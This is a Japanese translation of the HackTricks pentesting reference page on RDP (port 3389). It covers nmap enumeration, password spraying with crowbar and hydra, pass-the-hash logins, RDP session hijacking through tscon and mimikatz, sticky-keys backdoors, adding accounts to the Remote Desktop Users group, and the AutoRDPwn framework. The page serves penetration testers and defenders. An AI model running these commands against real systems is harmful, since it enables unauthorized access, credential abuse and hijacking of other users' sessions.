3389 - Pentesting RDP

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricks をサポートする他の方法:

脆弱性評価とペネトレーションテストのための即座に利用可能なセットアップ。20以上のツールと機能を備えた完全なペンテストをどこからでも実行し、レポート作成まで行います。私たちはペンテスターを置き換えるのではなく、彼らに時間を戻してより深く掘り下げたり、シェルをポップしたり、楽しんだりするためのカスタムツール、検出、およびエクスプロイトモジュールを開発しています。

基本情報

Microsoftによって開発された Remote Desktop Protocol (RDP) は、ネットワークを介してコンピュータ間のグラフィカルインターフェース接続を可能にするよう設計されています。このような接続を確立するには、ユーザーが RDP クライアントソフトウェアを使用し、同時にリモートコンピュータが RDP サーバーソフトウェアを操作する必要があります。このセットアップにより、遠隔コンピュータのデスクトップ環境をシームレスに制御およびアクセスし、そのインターフェースをユーザーのローカルデバイスにもたらすことができます。

デフォルトポート: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

列挙

自動

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

利用可能な暗号化とDoS脆弱性(サービスにDoSを引き起こさず)をチェックし、NTLM Windows情報(バージョン)を取得します。

注意してください、アカウントがロックされる可能性があります

Password Spraying

注意してください、アカウントがロックされる可能性があります

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

既知の資格情報/ハッシュを使用して接続

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

既知の資格情報をRDPサービスに対してチェックする

rdp_check.pyはimpacketから、特定の資格情報がRDPサービスに対して有効かどうかをチェックすることができます:

rdp_check <domain>/<name>:<password>@<IP>

脆弱性評価および侵入テストのための即座に利用可能なセットアップ。レコンからレポート作成まで、20以上のツールと機能を使用してどこからでも完全なペンテストを実行します。私たちはペンテスターを置き換えるのではなく、彼らに時間を戻してより深く掘り下げたり、シェルをポップしたり、楽しんだりするためのカスタムツール、検出、およびエクスプロイテーションモジュールを開発しています。

攻撃

セッション盗聴

SYSTEM権限を使用すると、所有者のパスワードを知る必要なく、任意のユーザーによって開かれたRDPセッションにアクセスできます。

開かれたセッションを取得する:

query user

選択されたセッションへのアクセス

tscon <ID> /dest:<SESSIONNAME>

今度は選択したRDPセッションの内部に入り、Windowsのツールと機能だけを使ってユーザーを偽装する必要があります。

重要: アクティブなRDPセッションにアクセスすると、それを使用していたユーザーがログアウトされます。

プロセスのダンプからパスワードを取得することもできますが、この方法の方がはるかに速く、ユーザーの仮想デスクトップとやり取りすることができます(パスワードはディスクに保存されずにメモ帳に表示され、他のマシンで開かれた他のRDPセッション...)

Mimikatz

これを行うためにmimikatzを使用することもできます:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

このテクニックをstickykeysまたはutilmanと組み合わせると、管理者権限のCMDと任意のRDPセッションにいつでもアクセスできます

すでにこれらのテクニックのいずれかを使用してバックドアを設置されたRDPを検索できます: https://github.com/linuz/Sticky-Keys-Slayer

RDPプロセスインジェクション

異なるドメインからの誰かかより高い権限でRDP経由でログインしてあなたが管理者であるPCに、あなたのビーコンを彼のRDPセッションプロセスにインジェクトして彼として行動できます:

pageRDP Sessions Abuse

RDPグループへのユーザーの追加

net localgroup "Remote Desktop Users" UserLoginName /add

自動ツール

AutoRDPwnは、Powershellで作成されたポストエクスプロイテーションフレームワークで、主にMicrosoft Windowsコンピュータ上でのShadow攻撃を自動化するために設計されています。この脆弱性(Microsoftによって機能としてリストされています)により、リモート攻撃者は被害者のデスクトップを彼の同意なしに表示し、必要に応じて操作することさえできます。これは、オペレーティングシステム自体に組み込まれたツールを使用しています。

  • コマンドラインから自動的にマウスとキーボードを制御

  • コマンドラインからクリップボードを自動的に制御

  • クライアントからRDP経由でターゲットにネットワーク通信をチャネルするSOCKSプロキシを生成

  • ターゲット上でファイルをアップロードせずに任意のSHELLおよびPowerShellコマンドを実行

  • ファイルのアップロードおよびダウンロードを、ターゲット上でファイル転送が無効になっている場合でも実行

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

脆弱性評価およびペネトレーションテストのための即座に利用可能なセットアップ。レコンからレポート作成まで、20以上のツールと機能を使用してどこからでもフルペンテストを実行します。私たちはペンテスターを置き換えるのではなく、彼らに時間を戻してさらに深く掘り下げたり、シェルをポップしたり、楽しんだりするためのカスタムツール、検出およびエクスプロイテーションモジュールを開発しています。

htARTE(HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学びましょう!

HackTricksをサポートする他の方法:

Last updated